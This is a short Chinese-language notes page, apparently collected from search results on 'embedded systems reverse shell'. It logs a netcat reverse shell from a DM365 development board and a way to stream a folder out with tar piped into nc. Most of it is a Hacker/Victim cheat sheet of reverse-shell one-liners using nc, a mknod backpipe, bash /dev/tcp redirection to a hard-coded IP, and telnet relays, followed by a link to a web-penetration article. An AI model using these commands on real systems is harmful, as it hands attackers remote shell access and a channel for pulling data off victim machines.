嵌入式系统 反射shell_百度搜索

DM365 测试nc反射shell 成功

开发板先 nc -e /bin/sh 192.168.0.46 1234

PC后 nc -vv -l -p 1234

接收文件夹的方式

PC先新开nc监听29995 nc -l -p 29995 >my.tar

PC后连接上开发板后输入tar cvf – *|nc 192.168.0.46 29995

Hacker:nc -lvnp listenport
Victim:mknod /tmp/backpipe p
Victim:/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
不使用nc
Method 1:
Hacker: nc -nvlpp 8080
Victim: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
Method 2:
Hacker: nc -nvlpp8080
Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
Method 3:
Hacker: nc -nvlpp8080
Hacker: nc -nvlpp8888
Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888

Web渗透中的反弹Shell与端口转发的奇淫技巧

http://www.91ri.org/9367.html

来源: 嵌入式系统 反射shell_百度搜索